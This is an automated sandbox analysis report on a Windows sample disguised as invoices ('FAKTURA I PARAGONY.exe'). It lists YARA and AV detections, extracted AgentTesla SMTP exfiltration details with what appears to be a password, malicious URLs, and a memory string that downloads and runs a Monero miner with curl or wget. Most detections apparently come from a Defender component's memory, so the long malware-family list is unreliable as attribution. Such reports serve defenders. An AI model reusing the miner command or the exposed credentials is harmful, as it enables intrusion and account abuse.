Windows Analysis Report FAKTURA I PARAGONY.exe

Overview

General Information

Sample Name: FAKTURA I PARAGONY.exe
Analysis ID: 1622
MD5: 0277ce10266c718b31d46a622acf1a43
SHA1: f9a05406e2407434e5359a8757d6f2bf0166b20e
SHA256: 1113efa42a416df493d712368060e751482e644c13f6c115a507ff001a322724

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos AESCRYPT Ransomware
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Yara detected GABUTS Ransomware
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Neshta
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected Sapphire Ransomware
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected Mailto ransomware
Yara detected CoronaCrypt Ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected Growtopia
Yara detected Xorist ransomware
Yara detected Windows Security Disabler
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Yara detected MaliciousMacro
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Yara detected BatToExe compiled binary
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Contains functionality to detect virtual machines (SGDT)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Creates files inside the system directory
May infect USB drives
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FAKTURA I PARAGONY.exe (PID: 9200 cmdline: 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe' MD5: 0277CE10266C718B31D46A622ACF1A43)
    • RegAsm.exe (PID: 420 cmdline: 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 8528 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • mpam-51041e98.exe (PID: 6724 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD MD5: C4DB3EC80A8918D80B802B6DA145FD82)
    • MpSigStub.exe (PID: 7120 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 1568 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 3992 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}

Threatname: Pony

Threatname: CryLock

{"Extensions": "trigger reboot 6[CC-Client] Command: REBOOT received"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp | CredTheft_MSIL_ADPassHunt_2 | unknown | FireEye
  • 0x15656:$pdb1: \ADPassHunt\
  • 0x15667:$pdb2: \ADPassHunt.pdb
  • 0x1567b:$s1: Usage: .\ADPassHunt.exe
  • 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute
  • 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute
  • 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
    00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp | webshell_php_by_string_obfuscation | PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming | Arnim Rupp
    • 0x4d2e:$opbs48: se'.(32*2)
    • 0x576f:$php_short: <?
    • 0x576f:$php_new2: <?php
    00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp | webshell_asp_obfuscated | ASP webshell obfuscated | Arnim Rupp
    • 0x4831:$asp_obf2: u"+"n"+"s
    • 0x4b6a:$tagasp_short1: <%e
    • 0x4b81:$tagasp_short2: %>
    • 0x4b6a:$tagasp_long12: <%ex
    • 0x4172:$tagasp_long20: <scriptlanguage="vb
    • 0x580c:$asp_payload2: eval(
    • 0x4254:$asp_payload8: execute(
    • 0x429e:$asp_payload8: execute(
    • 0x4b1f:$asp_payload8: execute(
    • 0x58a7:$asp_multi_payload_one3: .run
    • 0x6709:$asp_multi_payload_one3: .run
    • 0x7aaa:$asp_multi_payload_one3: .run
    00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp | webshell_asp_generic | Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file | Arnim Rupp
    • 0x6359:$asp_much_sus8: Webshell
    • 0x7fbd:$asp_much_sus8: Webshell
    • 0x4831:$asp_much_sus39: u"+"n"+"s
    • 0x4b7b:$asp_gen_sus10: "cmd"
    • 0x5730:$asp_gen_sus12: %comspec%
    • 0x40f2:$asp_gen_obf1: "+"
    • 0x458e:$asp_gen_obf1: "+"
    • 0x45d9:$asp_gen_obf1: "+"
    • 0x45e4:$asp_gen_obf1: "+"
    • 0x45ef:$asp_gen_obf1: "+"
    • 0x4624:$asp_gen_obf1: "+"
    • 0x462f:$asp_gen_obf1: "+"
    • 0x463a:$asp_gen_obf1: "+"
    • 0x466f:$asp_gen_obf1: "+"
    • 0x467a:$asp_gen_obf1: "+"
    • 0x4685:$asp_gen_obf1: "+"
    • 0x46ba:$asp_gen_obf1: "+"
    • 0x46c5:$asp_gen_obf1: "+"
    • 0x46d0:$asp_gen_obf1: "+"
    • 0x4705:$asp_gen_obf1: "+"
    • 0x4710:$asp_gen_obf1: "+"

    Unpacked PEs

    Source | Rule | Description | Author | Strings
    35.3.MpSigStub.exe.28bd63a2bca.206.unpack | Oilrig_IntelSecurityManager | Detects OilRig malware | Eyal Sela
    • 0x9a1:$one3: srvCheckresponded
    35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
    • 0x72db:$s1: http://
    • 0x72f2:$s1: http://
    • 0x730a:$s1: http://
    • 0x787f:$s1: http://
    • 0xae14:$s1: lppt>++
    • 0xae08:$s2: lpptw>++
    • 0x72db:$f1: http://
    • 0x72f2:$f1: http://
    • 0x730a:$f1: http://
    • 0x787f:$f1: http://
    35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack | IMPLANT_4_v5 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT
    • 0xa7af:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
    35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack | Derusbi_Kernel_Driver_WD_UDFS | Detects Derusbi Kernel Driver | Florian Roth
    • 0x74d2:$x3: \??\pipe\usbpcex%d
    • 0x7520:$x4: \??\pipe\usbpcg%d
    35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
    • 0xae1f:$xo1: Ik~mhhe+1*4

    Sigma Overview

    Networking:

    Sigma detected: RegAsm connects to smtp port
    Source: Network Connection, Author: Joe Security, Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 420, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49795

    Jbx Signature Overview

    AV Detection:

    Antivirus detection for URL or domain
    Source: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php, Avira URL Cloud: Label: phishing
    Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc, Avira URL Cloud: Label: malware
    Source: http://costacars.es/ico/ortodox.php, Avira URL Cloud: Label: malware
    Found malware configuration
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, Malware Configuration Extractor: Pony
    Source: conhost.exe.3892.43.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}
    Source: MpSigStub.exe.7120.35.memstrmin, Malware Configuration Extractor: CryLock {"Extensions": "trigger reboot 6[CC-Client] Command: REBOOT received"}
    Yara detected Predator
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RevengeRAT
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Pony
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Multi AV Scanner detection for submitted file
    Source: FAKTURA I PARAGONY.exe, Virustotal: Detection: 44%
    Source: FAKTURA I PARAGONY.exe, ReversingLabs: Detection: 26%
    Yara detected Njrat
    Yara detected AveMaria stealer
    Source: Yara match, File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Multi AV Scanner detection for domain / URL
    Source: mail.tccinfaes.com, Virustotal: Detection: 11%
    Source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd7850ae6.50.unpack, Avira: Label: TR/Patched.Ren.Gen
    Source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

    Location Tracking:

    Yara detected Hancitor
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 10_2_1CFC93E0 CryptUnprotectData,
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 10_2_1CFC99B8 CryptUnprotectData,
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----

    Exploits:

    Yara detected UACMe UAC Bypass tool
    Source: Yara match, File source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

    Privilege Escalation:

    Detected Hacktool Mimikatz
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, String found in binary or memory: blog.gentilkiwi.com/mimikatz

    Bitcoin Miner:

    Yara detected Xmrig cryptocurrency miner
    Yara detected Coinhive miner
    Yara detected BitCoin Miner
    Found strings related to Crypto-Mining
    Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, String found in binary or memory: stratum+tcp://
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, String found in binary or memory: pools.txt
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, String found in binary or memory: /cryptonight
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, String found in binary or memory: xmrminer
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, String found in binary or memory: URL of mining server
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
    Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, String found in binary or memory: \nscpucnminer\img001.exe
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp, String found in binary or memory: (){psauxf|grep-vgrep|grep"mine.moneropool.com"|awk'
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber||wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, String found in binary or memory: mv %s/xmrig %s
    Source: FAKTURA I PARAGONY.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknown, HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49785 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49786 version: TLS 1.2
    Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
    Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp
    Source: Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
    Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmp
    Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
    Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
    Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
    Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp
    Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
    Source: Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp
    Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
    Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
    Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
    Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
    Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
    Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
    Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
    Source: Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
    Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
    Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.6340275863.0000028BD67EC000.00000004.00000001.sdmp
    Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
    Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
    Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
    Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
    Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
    Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
    Source: Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp
    Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
    Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp
    Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
    Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
    Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
    Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
    Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
    Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
